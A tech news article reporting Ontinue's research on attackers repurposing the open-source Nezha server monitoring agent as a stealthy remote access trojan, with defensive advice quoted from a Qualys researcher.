A new report out today from Swiss artificial intelligence-powered managed extended detection and response company Ontinue AG warns of the growing abuse of Nezha, a legitimate open-source server monitoring tool, as a stealthy post-exploration remote access trojan.
Nezha, initially developed for the Chinese information technology community, has gained nearly 10,000 stars on GitHub and is actively maintained. The tool is used by systems administrators to monitor multiple servers, track resource usage, receive alerts and perform remote maintenance.
The problem with Nezha is that despite its legitimate use, it’s also now being used by attackers after initial compromise to gain persistent, high-privilege access to victim environments.
The Nezha agent by default provides attackers with system-level access on Windows and root access on Linux. That includes allowing for full command execution, interactive terminal sessions and file management without the need to exploit vulnerabilities or escalate privileges.
Since the software is legitimate and unmodified, it currently registers zero detections across major antivirus engines, including VirusTotal, making it highly effective at evading signature-based defenses.
Ontinue’s researchers discovered the malicious use of Nezha during an incident response engagement where the attackers attempted to deploy Nezha via a bash script that silently installed the agent and connected it to attacker-controlled infrastructure. The script included configuration values pointing to a command-and-control server and a shared authentication secret that allowed the agent to register with the Nezha dashboard.
The report notes that the deployment used a GitHub proxy service and disabled TLS, although the reasons for this remain unclear.
Further investigation found that the exposed Nezha dashboard associated with the incident appeared to manage hundreds of endpoints, suggesting widespread compromise. The infrastructure was hosted on Alibaba Cloud IP space geolocated to Japan, highlighting how attackers can easily blend malicious operations into legitimate cloud environments.
Testing confirmed that Nezha’s architecture, which combines web dashboard traffic and agent communications through a single port using standard HTTP and gRPC protocols, creates network activity that closely resembles normal monitoring telemetry. Because it does look legitimate, it allows attackers to maintain persistent access while avoiding obvious command-and-control indicators.
Mayuresh Dani, security research manager at the Qualys Threat Research Unit, told News via email that “the weaponization of Nezha reflects an emerging modern attack strategy where threat actors systematically abuse legitimate software to achieve persistence and lateral movement while evading signature-based defenses.”
“Networks where this server monitoring tool is pre-known defender teams might even overlook this anomalous activity,” explains Dani. “This is not novel at all, as this behavior has been seen in the past with the usage of ‘Living Off the Land’ techniques and remote monitoring and management tools such as TeamViewer.”
He added that “what’s concerning is that the Nezha agent provides SYSTEM/root-level access. Though it isn’t malicious by design, it helps threat actors repurpose the use of this legitimate tool, cut development time to reliably execute remote commands, access remote files and access the compromised system using interactive shells.”
Dani recommends that to defend against the risk, organizations should inventory all RMM and remote access tools deployed across their infrastructure, configure monitoring tools for behavioral detection with real-time alerting and, if necessary, establish lifetime restrictions on the usage of RMM tools to prevent malicious reuse.
Image: News/Ideogram
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About News Media
Founded by tech visionaries John Furrier and Dave Vellante, News Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
